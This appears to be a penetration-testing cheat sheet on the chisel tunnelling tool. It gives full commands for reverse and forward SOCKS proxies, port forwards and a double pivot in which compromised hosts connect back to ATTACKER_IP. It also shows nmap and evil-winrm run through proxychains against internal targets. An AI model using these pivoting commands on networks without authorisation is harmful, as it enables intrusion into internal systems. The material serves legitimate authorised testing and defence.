Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Download

# Releases
# https://github.com/jpillora/chisel/releases

# Match target architecture
chisel_linux_amd64
chisel_windows_amd64.exe
chisel_linux_arm64

Reverse SOCKS Proxy

Attacker (Server)

chisel server -p 8000 --reverse

Target (Client)

./chisel client ATTACKER_IP:8000 R:socks
SOCKS5 proxy available on attacker at 127.0.0.1:1080.

Use with ProxyChains

# /etc/proxychains4.conf
socks5 127.0.0.1 1080

proxychains nmap -sT -p 80,445 INTERNAL_TARGET
proxychains evil-winrm -i INTERNAL_TARGET -u user -p pass

Forward SOCKS Proxy

Target (Server)

./chisel server -p 8000 --socks5

Attacker (Client)

chisel client TARGET:8000 socks

Port Forwarding

Remote Port Forward

Expose internal service to attacker. 
# Attacker
chisel server -p 8000 --reverse

# Target
./chisel client ATTACKER_IP:8000 R:8888:INTERNAL_IP:80
Access http://127.0.0.1:8888 on attacker → reaches INTERNAL_IP:80.

Local Port Forward

# Target
./chisel server -p 8000

# Attacker
chisel client TARGET:8000 9999:127.0.0.1:3306
Access 127.0.0.1:9999 on attacker → reaches target’s local MySQL.

Multiple Tunnels

./chisel client ATTACKER_IP:8000 R:socks R:8888:10.10.10.5:80 R:9999:10.10.10.5:445

Double Pivot

# Attacker → Host1 → Host2

# Attacker
chisel server -p 8000 --reverse

# Host1
./chisel client ATTACKER_IP:8000 R:1080:socks
./chisel server -p 9000 --reverse

# Host2
./chisel client HOST1_IP:9000 R:1081:socks
Configure proxychains with chain: 
socks5 127.0.0.1 1080
socks5 127.0.0.1 1081

Quick Reference

TaskCommand
Reverse SOCKSServer: chisel server -p 8000 --reverse / Client: chisel client IP:8000 R:socks
Port forwardClient: chisel client IP:8000 R:LOCAL:REMOTE_IP:REMOTE_PORT
SOCKS portDefault 127.0.0.1:1080